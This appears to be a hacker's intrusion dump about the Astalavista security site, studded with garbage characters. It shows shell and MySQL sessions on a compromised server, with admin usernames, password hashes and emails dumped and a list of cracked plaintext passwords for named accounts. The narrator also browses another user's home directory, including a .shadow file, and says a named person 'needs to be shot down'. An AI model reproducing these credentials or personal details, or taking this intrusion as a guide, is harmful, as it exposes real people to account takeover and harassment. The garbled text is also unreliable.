8 K m( W6 j. j6 a/ \* \$ Z <description>All availably Exploits.</description>+ c4 _( L4 k$ C
<language>en-us</language>
6 G/ W6 k& L7 ]$ l# _ <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
3 U; ~% i1 Z9 L5 k @9 R9 m <docs>http://blogs.law.harvard.edu/tech/rss</docs>6 Q( ` J7 F" w$ m. d. m0 u) { T
<generator>Astalavista.com</generator>9 U( Z8 L S; N& V1 w
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
+ C* c6 @$ X. o9 w; g% c </channel>" H2 ?- D. K, W9 k
</rss>’;
% X+ n* m+ ^ {, W" c
6 D$ Q& z% c0 x/ Y% }5 _ if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {2 J4 V* d7 w$ r( k$ O! `
unlink (FULLPATH . ‘/feed/exploits.xml’);' w6 f4 k' d% Y- J
}5 V3 [" W( c0 |' y1 x& D5 }, J5 \. J
0 k$ v8 M; e0 z+ {# ?
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);- {% ], X J8 b" m. h. T
[snip]
: f5 G4 Z1 k# d6 |! @1 X) C8 g9 B) {8 _
sh-3.2$ cat exploits.sh
) C1 r* n5 P# {0 k6 p6 a#!/bin/sh% N" S# c; \; j0 n9 Y
0 g7 s) I* [6 J* O2 ^7 V
###########################################################
: s5 h) U3 u% S. v3 F# #
' O- _% u" v6 k9 ]) Q: @# Title: milw0rm exploits adder #: V6 V1 x/ O- e4 e* l+ r3 _
# Description: Add all milw0rm exploits to the #
8 c! X( C2 L( ]4 ?0 h# Astalavista.com database #
' \0 _7 |& X% ?7 C# #
2 ~1 H9 Q+ k* U# Company: Astalavista Group #4 K" W! X0 W# e/ K8 k
# Author: Paulo M. Santos #( T; r4 a+ D$ \7 ~. a" o
# E-Mail: 链接标记paulo.santos@astalavista.ch #3 f' @( d+ o9 Z3 z
# #' ?: \& Z( L# V1 ]2 B
###########################################################' N7 Z; o' t6 Q, g
1 A( l F7 M6 Z. `4 b+ g# path
) u) u9 x9 @) x& q+ {this_path=/home/com/public_html/modifications/cronjobs6 j1 h/ F3 R& X4 b( q
5 D7 f; [0 {4 L5 D# w: _4 N: K
# change directory! B+ U) u8 ^' Q' f; I9 w4 Y: D
cd $this_path
% s, V" y% V% w" z5 C' Tcd tmp/
4 i7 _9 B: q: | m# h
7 |( T* V0 S/ u h2 v! D# delete files
. Y3 K& ?0 L0 l/ @1 }# d6 \rm -rf milw0rm.tar.* &( R( ]* Y7 B- X4 D/ j) T: p, w; o2 F( X
rm -rf milw0rm/ &" W3 @2 Q+ i$ @) E! e4 S# f
' {8 K: F" N: s! \# t$ m2 K# wget milw0rm paket
, u1 e7 v( s$ @6 \% K4 e' Kwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
N& P/ E. Y, P7 L& n( L* d0 A1 k8 v8 o! C! O- x
# extract milw0rm paket8 ^1 k: } S6 U" K0 N1 B
tar -xvf milw0rm.tar.bz2
7 j8 u r4 D: \- ~9 s4 T9 C2 B n: V' c# w9 N* \+ L3 j
# change owner
# |6 ]4 }8 X7 s$ w/ e& N- J( M. o1 Uchown -R com .& }4 A* u) v0 ^$ P: j" p7 i: z
chgrp -R com .5 }) j& y" P' s) a
( v7 C! y( ~' K) n! z q' l; O8 n# execute php script
+ s* T! C2 j) C9 z: lcd $this_path
& a; b0 A* i6 C( Gphp -q exploits.php
9 Q9 I/ x: p$ }! C- m0 Y; m$ b
5 v$ \8 M; f" p) K; M# delete files5 r2 M/ v8 \: [0 ]
rm -rf tmp/milw0rm.tar.*
2 A& z7 {! {$ Z3 L2 D- M" mrm -rf tmp/milw0rm/
' w1 B! a3 N4 R$ I7 q8 ^: n2 q
$ k% ?: a) Q" N' o2 W9 Psh-3.2$ echo “Paulo M. Santos needs to be shot down.”
4 Q, H, Y/ a, e% k7 m' r7 _Paulo M. Santos needs to be shot down.3 h1 A! v& A: p$ y
* c* ^; x5 R# R+ e4 s
mysql -u contrexxuser2 -p
1 o* `9 u F1 `3 eEnter password:
3 ]: H2 i5 ?5 g( `0 Y4 H$ h" ~5 A& EWelcome to the MySQL monitor. Commands end with ; or \g.
' `7 s& V8 T! I& L( kYour MySQL connection id is 261694
, t: X4 K/ y; X. a8 Z$ H, [. D: pServer version: 5.0.45-community-log MySQL Community Edition (GPL)1 u5 U$ }! A, p# ]
! Z* w! \6 s3 F8 z8 ~% |7 F' R2 GType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.: k" e' C8 q0 ~3 [/ q* G; ]
/ N( {$ i9 c6 I! B. T% {mysql> show databases;
/ A! A! l2 V- M3 h7 F8 q+——————–+& A( C0 J: m5 s0 A
| Database |, h- w, M" S0 f* ?
+——————–+; ?: T. L1 H1 x8 J3 l! R
| information_schema |( }9 @- `7 X' n; X2 H
| com_contrexx2 |8 w' S- Y# ?9 X% ?% l
| com_contrexx2_live |
S) C& q4 q7 J7 h" b/ z, t| test |% N- z- s% r# D$ W
+——————–+: n1 c" M+ B; A
4 rows in set (0.00 sec)
9 j, L/ E2 y0 l6 A) p& X' x7 d. ~* A. s/ Z9 Y: y
mysql> use com_contrexx2_live
. |+ M3 u, {2 V$ w& hDatabase changed
5 }- g9 a7 s9 z$ I! _5 s+ Cmysql> show tables;2 b; Y% ?$ E, X: J: g
+————————————————–+
' W5 U- D3 q7 || Tables_in_com_contrexx2_live |- ?2 w4 i! K# ^) _* K, }
+————————————————–+7 P* t4 |& M r
| cc_banner_counter |! Z E5 X6 U9 A B' z0 l( g3 B' E+ i
| cc_search_counter |3 }* s2 K) I( E5 X6 D' ]9 O% Y
| contrexx_access_group_dynamic_ids |
: ^7 i6 ?) p( U0 z: c5 Z| contrexx_access_group_static_ids |& z/ W* L% e" R0 t9 U9 m
| contrexx_access_rel_user_group |& M3 h0 E. [4 t, q+ n$ q# b
| contrexx_access_settings |9 _ ^( [4 G3 r$ j& f: d
| contrexx_access_user_attribute |
8 ?8 T0 a$ D6 H* E) G0 L9 }| contrexx_access_user_attribute_name |
" [ ]9 C! [2 @" V5 B$ J, u7 p1 G| contrexx_access_user_attribute_value |
) Z+ y3 ^& H M4 O| contrexx_access_user_core_attribute |
/ m' ?' j3 V0 ~| contrexx_access_user_groups |
7 |1 ^$ L6 n9 b3 a! e+ m' `4 ]| contrexx_access_user_mail |
- k2 k8 D# M: T& o| contrexx_access_user_profile |
+ |7 m. m: c& j% a( X/ o| contrexx_access_user_title |) h% f, E. w% A+ ]( _
| contrexx_access_user_validity |
3 r6 \& u) l7 E7 F( a8 }8 c| contrexx_access_users |
( y$ U Q* W; m) i| contrexx_backend_areas |6 f- n) N Q& E: w
| contrexx_backups |
* T& z/ O- ?( n0 E4 z| contrexx_content |
" K1 \( E" \& E% ~4 J| contrexx_content_history |
- X! P* x# |; H' l| contrexx_content_logfile |" E: e7 q- b6 x3 Q7 O
| contrexx_content_navigation |
& K+ F+ d" A$ M& a! A$ c| contrexx_content_navigation_history |' o! R1 ?8 C* J- |" ?# V9 i# o
| contrexx_ids |
6 C3 w) W) O3 ?$ @5 G5 h2 J| contrexx_languages |0 G: ~2 ?, ?' @3 o( }/ Q7 H7 c* G8 E
| contrexx_lib_country |# Q+ ^0 i, g3 q+ _8 u* y8 d4 M+ Z
| contrexx_log |; l, x: X8 E$ E D T
| contrexx_module_alias_source |
( @0 g' F( H; R# N) \| contrexx_module_alias_target |- p5 f% c& T* b* D
| contrexx_module_block_blocks |
, F" z2 j; x j+ d- q& D# Z| contrexx_module_block_rel_lang |3 I( Z" h3 E- V- x7 }2 \
| contrexx_module_block_rel_pages |- Q" S6 Z6 T! ?+ B+ h7 M
| contrexx_module_block_settings |
3 B3 _5 k# T% o+ @' x$ f| contrexx_module_blog_categories |. J- l! f- R4 r3 O4 `# R
| contrexx_module_blog_comments |* z! J) e( P0 f+ }8 |5 u8 D' A
| contrexx_module_blog_message_to_category |$ }6 N4 J; H+ m* `2 D
| contrexx_module_blog_messages |! ?3 F" W( [+ O" ^- ~+ t# L" v
| contrexx_module_blog_messages_lang |
/ o3 g+ W; V8 O$ B9 X% o, R| contrexx_module_blog_networks |& q/ P8 Z' x' U' e# ? N
| contrexx_module_blog_networks_lang |; I$ G% v/ c5 m0 \. ~- ^! k3 l
| contrexx_module_blog_settings |
0 A8 W+ r* n; D9 \) @- @3 ^% [| contrexx_module_blog_votes |
' f5 [6 h# M: Q* B6 E4 Q% |) || contrexx_module_calendar |+ C7 R7 i; F6 n, B4 K& l
| contrexx_module_calendar_access |* M6 U; u+ z+ `" E- X* g
| contrexx_module_calendar_categories |# {: n x1 a) y" O3 h, S- @5 V/ A
| contrexx_module_calendar_form_data |$ J/ A& l2 L- Z
| contrexx_module_calendar_form_fields |
# R; h: _7 _& d$ }0 m) Y) G| contrexx_module_calendar_registrations |
9 H- a$ F7 [8 G+ R* l9 W| contrexx_module_calendar_settings |7 T1 ^2 M& s+ E
| contrexx_module_calendar_style |
4 L2 s# w' _- |* r| contrexx_module_contact_form |7 ?6 B9 a7 m: x8 G6 q
| contrexx_module_contact_form_data |
4 [/ s& R7 O9 I2 U* a* y1 }! Q| contrexx_module_contact_form_field |
. `' D2 c0 r+ m( J8 M+ J% M& ?| contrexx_module_contact_settings |
! W% q+ T4 V# ~* D" m| contrexx_module_data_categories |
3 M9 I7 c: c3 D| contrexx_module_data_message_to_category |, \/ J& Q: R& K8 Z
| contrexx_module_data_messages |
+ e! f4 W; L# w0 R" h| contrexx_module_data_messages_lang | F1 S1 z% ~# T9 h
| contrexx_module_data_placeholders |
* R; w" j0 k/ Z. e| contrexx_module_data_settings |! F" ?' [0 d& A8 z' t4 F3 i( A
| contrexx_module_directory_access |
0 j2 F$ T+ E( k6 G' [- L; ^| contrexx_module_directory_categories |
/ A9 v$ e2 p$ u| contrexx_module_directory_dir |' m$ J! ?& v3 k; a
| contrexx_module_directory_inputfields |: `( Y; E3 J: u, a
| contrexx_module_directory_levels |, L1 v! J9 r' E/ V( a
| contrexx_module_directory_mail |
' K4 J: {& g/ D3 z" }| contrexx_module_directory_rel_dir_cat |8 m. P8 E( a0 J
| contrexx_module_directory_rel_dir_level |3 A% d% a' J$ u) a
| contrexx_module_directory_settings |
+ c' W/ i+ W! b| contrexx_module_directory_settings_google |; s4 f* X9 I4 k1 t+ t
| contrexx_module_directory_vote |1 p. b' d: }/ V) n q H6 a' K
| contrexx_module_docsys |
, X5 d* H0 s# J$ t- m| contrexx_module_docsys_categories |7 D, O2 {: D8 U1 T G
| contrexx_module_egov_configuration |
) l. g# h! q& h! e/ A| contrexx_module_egov_orders |
4 o5 k: S' D) I1 h/ {6 v' T| contrexx_module_egov_product_calendar |
& z& c a8 L! `* Z+ h| contrexx_module_egov_product_fields |
. s' L$ B" D0 [0 R4 F! a| contrexx_module_egov_products |. C& f- I& Z7 }6 {: R, z i! |7 \
| contrexx_module_egov_settings |
" o9 _. ]9 x. q. Y" H4 {| contrexx_module_exploits |
/ I8 K6 ~# d' ], W' v5 q8 z| contrexx_module_exploits_categories |
' w7 ?& G8 C. A7 \| contrexx_module_feed_category |# T* Z$ q( g6 l3 h2 Q1 o
| contrexx_module_feed_news |+ I3 m: V I# V* E, |$ b; N( ]
| contrexx_module_feed_newsml_association |! S. l1 T/ l9 [$ }* {9 r. O: Q" y
| contrexx_module_feed_newsml_categories |
. d$ h: |, N3 b* v* a6 U$ i| contrexx_module_feed_newsml_documents |
1 f" g3 i' J" ^+ C# Z; N7 o| contrexx_module_feed_newsml_providers |
! l' }3 }" F& E/ Y ]4 X- g| contrexx_module_forum_access |2 C7 W+ D/ w1 o
| contrexx_module_forum_categories |
) F2 I2 S- W R, _| contrexx_module_forum_categories_lang |. F. F3 x" y/ d; J* S
| contrexx_module_forum_notification |
0 t& W& {1 h1 u2 v# P( W| contrexx_module_forum_postings |1 F- Q* {9 Z$ z/ Z) ^" V- S' v! N
| contrexx_module_forum_rating |
2 N2 z0 v3 l% `) J" O3 l| contrexx_module_forum_settings |
7 R z" @* Y* ?3 E' _| contrexx_module_forum_statistics |. O# Y: s4 H) t8 ? y1 T
| contrexx_module_gallery_categories |; d3 S$ n$ E3 W3 O5 y: \4 `
| contrexx_module_gallery_comments |
- S5 x( H3 e. q# i% o; C3 P| contrexx_module_gallery_language |
+ w/ `& M: [/ a( P& I5 h0 \| contrexx_module_gallery_language_pics |" o: l3 V% `4 \5 v
| contrexx_module_gallery_pictures |5 h* ?0 }+ V; v
| contrexx_module_gallery_settings |8 Z8 l4 u2 Q4 b3 v, b6 y
| contrexx_module_gallery_votes |
6 t# c, j2 g3 ^| contrexx_module_guestbook |' X* s4 }, O/ M7 y
| contrexx_module_guestbook_settings |
$ i: z. c! D( M( Q| contrexx_module_livecam |
- w- C# Y; x; q6 `0 e| contrexx_module_livecam_settings |
1 R7 I( C, @( f1 E% w8 N| contrexx_module_market |6 C. c, X* h/ @9 m7 g# Y' ] O8 s
| contrexx_module_market_access |; @+ u7 Y- ~0 w- l N7 q
| contrexx_module_market_categories |
$ @2 U6 b3 i0 _9 Y1 z| contrexx_module_market_mail |9 a Q8 D3 q2 t3 O/ t
| contrexx_module_market_paypal |
O) t6 m0 k# B/ l| contrexx_module_market_settings |' P. `& r) ]- y, N8 v1 z6 B- U. h- p
| contrexx_module_market_spez_fields |+ n d( O& Q6 W+ U) `- M0 }
| contrexx_module_mediadir_access |0 s0 T: r. A6 r' ~8 h
| contrexx_module_mediadir_categories |
8 }/ r9 G7 z* i| contrexx_module_mediadir_comments |
; I7 T5 O& Z4 ^& m/ @0 w; `| contrexx_module_mediadir_dir |
9 ]! v1 _* K" i. P5 E5 y| contrexx_module_mediadir_inputfields |
3 Y! ^- v4 g0 f4 J9 a) c| contrexx_module_mediadir_levels |
C' ^' a& }# L, U| contrexx_module_mediadir_mail |
6 a1 p+ `+ |0 F/ x| contrexx_module_mediadir_rel_dir_cat |* j# Z+ N& O1 f
| contrexx_module_mediadir_rel_dir_level |
9 ~1 }+ r) q: X: Z1 N$ U! h| contrexx_module_mediadir_reports |
/ P0 A: z0 T' F8 K R/ N| contrexx_module_mediadir_settings |
' P8 L2 R: `" \$ n- L. I| contrexx_module_mediadir_settings_google |
6 i/ R# f0 H4 Q# c! Z| contrexx_module_mediadir_vote |
0 ^ T) u/ Q4 r# W/ r0 O| contrexx_module_memberdir_directories |
" P+ i- Y7 W# y8 Q, r: B| contrexx_module_memberdir_name |
: U: H0 z! e+ M, q9 `| contrexx_module_memberdir_settings |0 q( a/ I% Y& l- y$ l- \6 i* y$ e
| contrexx_module_memberdir_values |
9 b- v7 h$ i0 z# c# f3 v| contrexx_module_nettools_allowed_groups |, x3 }8 E. P7 Z, K5 o! c2 y* M
| contrexx_module_nettools_settings |
: w4 k2 {, \3 X| contrexx_module_news |5 T, ~: E6 z2 W/ z5 e
| contrexx_module_news_access |4 E6 R4 ~/ n2 s: l) J; z! _9 |4 [! X
| contrexx_module_news_categories |
$ D2 ^, J: z! ]& \$ S5 ^( O| contrexx_module_news_settings |, b- f/ d3 z1 ~2 r7 {# a3 F
| contrexx_module_news_teaser_frame |
# m- n/ j; m! M/ J' t: J( y. O, N || contrexx_module_news_teaser_frame_templates |
# X! B$ }$ d0 b* O' @- E4 \7 |7 m( \| contrexx_module_news_ticker |
6 i! j+ W1 a9 Z# j) V| contrexx_module_newsletter |
/ K4 ]* R& I% F, e/ K: Y5 ]/ |9 T| contrexx_module_newsletter_attachment |
4 W( T: a2 W, M$ U| contrexx_module_newsletter_category |+ @# N" o; p: i; z, @. i/ ^
| contrexx_module_newsletter_confirm_mail |
- X+ P' _' K0 x* U i0 O, F0 R6 `| contrexx_module_newsletter_rel_cat_news |
6 Z* _+ z3 f+ h; B4 g. n1 y| contrexx_module_newsletter_rel_user_cat |/ l7 W) k+ X& B- H9 p6 I, h+ S
| contrexx_module_newsletter_settings |: P- f6 ?; `$ y* @+ s; N; G6 [
| contrexx_module_newsletter_template |( M* F+ q! u7 J1 a4 a9 w( C9 L* G
| contrexx_module_newsletter_tmp_sending |
( E% u9 X( Q( K2 \& V0 L: I| contrexx_module_newsletter_user |
0 |" s8 f6 G; }, b' z. Z| contrexx_module_newsletter_user_title |( m* b. d* p+ B3 E- b
| contrexx_module_onlinetools_defaultports |
0 l8 I- H, J3 ^( K: P| contrexx_module_onlinetools_defaultports_back |
8 U: ]# n% O6 w0 j3 R& s6 X& c| contrexx_module_onlinetools_geolitecity_blocks |3 i( G6 B4 P/ [+ w$ T# x
| contrexx_module_onlinetools_geolitecity_country |7 n7 n% A7 y' z' d8 C" [
| contrexx_module_onlinetools_geolitecity_location |
3 w1 i- a; w* }4 |% q9 a4 H| contrexx_module_podcast_category |4 q4 k. }+ a; P& B& R" w, S
| contrexx_module_podcast_medium |
; i i% @. x: }- R| contrexx_module_podcast_rel_category_lang |3 A) ~5 ?8 @1 w/ k
| contrexx_module_podcast_rel_medium_category |
! d2 l. M+ H. I4 `| contrexx_module_podcast_settings |
/ ~: O% u4 @, ]5 Z# G| contrexx_module_podcast_template |
& ?& Y M- ^5 h* D| contrexx_module_proxydb |
6 ^; {" [5 \! E- `# ^( a' s# R| contrexx_module_recommend |% J. S. [+ p% o- I5 M
| contrexx_module_repository |
! L5 v* p& V- o| contrexx_module_securitynews_cats |
& J0 _. v! \( G! N0 a! M| contrexx_module_securitynews_feeds |
$ I+ V4 Y; n; s4 U" @, C| contrexx_module_securitynews_news |* |/ h+ s! d R
| contrexx_module_shop_categories |2 E+ r, }! x3 V1 k0 P, a
| contrexx_module_shop_config |6 ~$ N* x6 s% K6 P. |# e0 E" Z
| contrexx_module_shop_countries |3 k( u9 ^* p& H' N, p8 o P$ H
| contrexx_module_shop_currencies |2 U% g7 I! [; X" A+ \
| contrexx_module_shop_customers |
2 D; m* Q' m. [8 @7 w6 E% y| contrexx_module_shop_importimg |
) A( G7 R: F9 Q| contrexx_module_shop_lsv |
& O5 B0 ^7 q2 c4 h! U| contrexx_module_shop_mail |
1 V% Y. a; ^& i4 R' n| contrexx_module_shop_mail_content |9 |+ I8 T0 h* R6 `0 P; @$ }* g
| contrexx_module_shop_manufacturer |
c% R8 N8 ]" y) Y4 U6 g| contrexx_module_shop_order_items |1 \2 l4 |/ t: `4 k
| contrexx_module_shop_order_items_attributes |
: M" M" H P& O& T; h| contrexx_module_shop_orders |$ \! N6 F3 m( h
| contrexx_module_shop_payment |
' `% G& d6 H3 D| contrexx_module_shop_payment_processors |2 {9 O# Z( W* I" W% n5 @" E
| contrexx_module_shop_pricelists |- H* c: j. n4 b# Z$ U
| contrexx_module_shop_products |1 h( d) v q4 W. g+ k) t5 v# r
| contrexx_module_shop_products_attributes |0 P0 V( J& S: H n3 k" G4 X
| contrexx_module_shop_products_attributes_name |, p3 h" z- K" I) Y5 }
| contrexx_module_shop_products_attributes_value |
' P( L. m" ]5 _" W/ ], A5 I$ r- c| contrexx_module_shop_products_downloads |/ K4 G6 l/ z% ?# u- m! p
| contrexx_module_shop_rel_countries |. V8 I7 {; }: C; f; M9 C1 y
| contrexx_module_shop_rel_payment |
+ R F2 M' {+ a3 h% Z| contrexx_module_shop_rel_shipment |
. h& \* G1 _7 I% |% t| contrexx_module_shop_shipment_cost |
( G: I+ ]- P5 H- }: o, U| contrexx_module_shop_shipper |
! Y$ ^, H A8 N }| contrexx_module_shop_vat |
/ S+ o$ y9 r! e| contrexx_module_shop_zones |' \& i" r9 H" E% l \9 D6 V
| contrexx_module_u2u_address_list |
* D$ H: y* t# K| contrexx_module_u2u_message_log |" ]: N; d7 i0 i
| contrexx_module_u2u_sent_messages |8 [& O3 d& u& X1 V: O9 M
| contrexx_module_u2u_settings | P! B6 A% _' J2 V
| contrexx_module_u2u_user_log |
+ C$ P/ E6 t) t5 p* ~5 G| contrexx_modules |3 p9 b& m) j6 G+ O
| contrexx_sessions |
* H7 r. b* U& S6 n7 z| contrexx_settings |
. a1 r5 I5 W7 y| contrexx_settings_smtp |- i; b+ @5 h- O9 B6 i' [6 O
| contrexx_skins |1 I9 W& y1 z z4 Y
| contrexx_stats_browser |
5 \- p2 M" m" W) U4 e| contrexx_stats_colourdepth |& l& C5 Z+ \) Z
| contrexx_stats_config |+ n, X; }( g& [
| contrexx_stats_country |: u/ C$ `8 y- t1 g
| contrexx_stats_hostname |7 F: t# W3 T, L3 v% |
| contrexx_stats_javascript |
; W* f0 |, r& |! ^, f$ ~| contrexx_stats_operatingsystem |
! R3 Q' T4 ~4 }| contrexx_stats_referer |- W$ {7 A) n1 `3 r; R/ S* ~' H. u1 |
| contrexx_stats_requests |8 Y8 e8 i( B# \* u/ r
| contrexx_stats_requests_summary |
7 T( D9 a4 g- \. \| contrexx_stats_screenresolution |$ v6 E5 Y, u) X; q6 Z1 X6 U. h
| contrexx_stats_search |% L/ P& B0 @. }; m* ^) n
| contrexx_stats_spiders |
# D' R% {; t# f; I, I" V| contrexx_stats_spiders_summary |4 `+ l. G7 ?1 Y b
| contrexx_stats_visitors |, J' R4 o$ ]% {
| contrexx_stats_visitors_summary |" s q# j& y; F* D' ^
| contrexx_voting_additionaldata |
% o0 _8 F8 \# R2 z| contrexx_voting_email |
/ q4 @* T* x7 R: l$ P6 a| contrexx_voting_rel_email_system |
0 k) J: r/ h Y; S| contrexx_voting_results |
3 T7 [1 K; ~: [' | P7 r3 R| contrexx_voting_system |
0 [/ R1 r9 |8 E" s' z Z* e; K| foo |
, k1 S V' b9 S# E8 i" q+————————————————–+
5 a1 C! o% ^3 J i9 G227 rows in set (0.01 sec)
' {1 |6 \4 N" i7 @7 h7 F; V% ]9 E5 A
mysql> select count(*) as skids from contrexx_access_users;1 J% w F3 M7 A# }) }4 l: I
+——-+
2 x6 T% \3 i( q! R/ Y| skids |# k3 H6 ~! j, H# w* v/ y" a) C! y, E, w4 b
+——-+
3 V8 w7 h/ z6 f| 53699 |5 ? r5 E# `* [
+——-+
^1 e7 P) J* }( t0 s" G1 row in set (0.00 sec)
5 S) X& r9 g& `7 Q- Q2 e: P' b) Q8 e$ [5 R
mysql> describe contrexx_access_users;# e i1 q) w5 }# r. |3 P$ ^! X
+——————+——————————————+——+—–+————–+—————-+
2 t* a0 i+ m2 h4 s, G6 u- L| Field | Type | Null | Key | Default | Extra |
; g Z2 S7 l4 t S) [+——————+——————————————+——+—–+————–+—————-+
( P5 [( [8 I& w# v/ f; K| id | int(10) unsigned | NO | PRI | NULL | auto_increment |6 b7 C+ C( Q# b. M% v# \, I8 _) ?6 u
| is_admin | tinyint(1) unsigned | NO | | 0 | |/ A$ \: D- v/ J( v
| username | varchar(40) | YES | MUL | NULL | |- H0 O- a8 t2 v* U ]& `
| password | varchar(32) | YES | | NULL | |4 K `- ]2 r B
| regdate | int(14) unsigned | NO | | 0 | |# P8 t4 i5 j4 F5 [! V5 Z; Y
| expiration | int(14) unsigned | NO | | 0 | | P8 |; u7 G+ c
| validity | int(10) unsigned | NO | | 0 | |
0 H- \8 i! k8 F| last_auth | int(14) unsigned | NO | | 0 | |/ p) \9 D9 [+ E; {5 u
| last_activity | int(14) unsigned | NO | | 0 | |- ]7 E! X7 I# r" O. h5 A
| email | varchar(255) | YES | | NULL | |
t! |' j# G% {0 t: f/ N9 E; |. i| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
% v/ b, h: Z9 t| frontend_lang_id | int(2) unsigned | NO | | 0 | |% k* K. s- H/ Y# U8 H
| backend_lang_id | int(2) unsigned | NO | | 0 | |4 M5 w O4 J% A$ C$ t
| active | tinyint(1) | NO | | 0 | |+ F' V% X- A5 T* d3 F
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
* i' L( n! Y! t5 O/ l| restore_key | varchar(32) | NO | | | |
9 u/ _9 R! u( g* L9 || restore_key_time | int(14) unsigned | NO | | 0 | |
3 E% g' C b8 ?3 U| u2u_active | enum(’0′,’1′) | NO | | 1 | |
$ T( C9 N/ b& x1 `" | E( w+——————+——————————————+——+—–+————–+—————-+, D/ E2 X& F0 }) q2 {( Q5 u
18 rows in set (0.00 sec)
4 V. x4 |7 O) s" d5 d$ S) V% f+ Y' a" L5 B' k- K1 }/ T# b! Z
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
# r8 A$ u8 M; }% e' y( N; g* u+————+———————————-+—————————–+
! @+ q* k% o2 Z+ I$ v$ h. M| username | password | email |
1 ?8 M& Y6 n$ K) \+————+———————————-+—————————–+
+ |, @4 s6 r! D! { \| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |' Q7 j5 M4 e8 a/ ^
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
" h% D! O1 _& b5 i8 g| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |8 u& m4 l# _' C. l& a: ]# S
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
' @0 b' [+ E/ [- v, d+————+———————————-+—————————–+6 d. i$ V# [9 G
4 rows in set (0.04 sec)
7 E! D. \% R5 `: r! N, O- U7 f/ `* H5 j7 f" P' b' o3 s
mysql> exit;
9 D3 R- p' `/ u- O& UBye
- C F6 K6 Q) x. P3 p
0 c, j E* _+ A) s8 g& A6 h[~] There you go, your “team of security and IT professionals” is a joke.' K7 D" r+ c. p+ r/ V
9 y: A7 n2 k( Z2 t0 G. o+——————————+
; d1 R! Q" m c. ysystem:f82BN3+_*
& z g' C4 W! h* J% H+ S. i, aBe1er0ph0r:belerophor4astacom' ]& m6 M j. r7 K* b6 g
prozac:asta4cms!$ K2 g2 H& v) S
commander:mpbdaagf6m
) \. R' X% k9 C, h4 xsykadul:ak29eral- S$ k: F+ t% j9 H2 U2 o! o6 Y8 J
+——————————+0 u4 h* u4 w! {; |9 [, m6 `
3 ]2 ^0 v1 P/ i r[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)1 G9 N/ E* D T
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
# q1 O/ V/ x9 x: X& p$ P2 z/ h* }5 j: O8 |- |
[~] Lets move to astalavista.net now,8 r- b- c+ [- z/ Y" ~! M
. f; d! F" e( F9 A* l) R# ?3 |" l
From <链接标记[url]https://www.astalavista.net/[/url]>:( v0 k; L2 V, d, T( }! V2 @+ G
>> Everyone knows that the best defense is a good offense.
8 F4 ]" z; D% K, k>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.- r V0 x, ?) I# g7 K: k
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.' z+ c# J& k9 F( l% S6 i
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”4 T, l" h- b/ z1 ~! p5 S# W4 R
; ~; B" c& \+ y
>> Go ahead, try and hack our server . in a completely legal way!2 ~0 t9 M) X$ w, p' g3 F0 s
>> Learn by doing: We offer our members tricky tasks and challenges on an
' V. z p. S0 z4 h7 O0 h>> ongoing basis so you can test your knowledge and abilities. You can also
: F4 H" v: D( l. i>> demonstrate what you.ve mastered by taking part in regular hacker contests
6 h# M e5 N; p+ Y>> and war games5 C) R+ D: P# n2 ~- Z
B# i- O" ]) ]7 Z+ ~0 h6 N
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!! G# S# V% s. N; u3 g
8 M/ l% F: j) z4 ]4 X- M[-] Tricky task: Find home dir of astalavista.net/ \7 r* u* Y& @ [* j+ D
: `' h1 h" O* U9 P( [+ W1 B
sh-3.2$ ls -la ~astanet
$ {$ M+ c. w+ Vtotal 48
) Z" G! \9 I0 x1 j3 _! _drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .7 u* n1 M0 v, _ c7 ~
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
+ f9 `1 ]. _- x$ Q4 o& d; @drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth, I4 S2 r$ K5 p$ u& _0 O* _
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
5 G6 A6 `0 h! m; K-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
% @$ C& Y: D1 I2 ?9 X$ M9 F-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
1 D' m& W- D$ K-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
! q3 A9 C5 T& }; m; ydrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains% I1 k: E6 c; P1 X' h5 n+ {5 s
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
3 J. M4 |. F* [1 Pdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail, B8 A( l8 ^+ H. ~& \" u
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
9 r6 O0 |' [ s" W! u) P* {-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
: |7 H) M1 d0 f3 t2 l5 m. K* U6 d8 N" p% S; M
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
$ X# }3 S" c" n0 O! g6 i% l/ ]sh-3.2$ ls -la3 n3 n4 [, H0 n+ f$ |) [/ \
total 200$ }+ \$ Z6 O3 O0 c: [' U/ y
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .5 C+ ], |# R$ J# T4 P w
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..9 A: Q1 F* v, ~' }* W& C
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007: g% ?! x8 a7 D/ _' ]3 U5 Z9 S& l! y
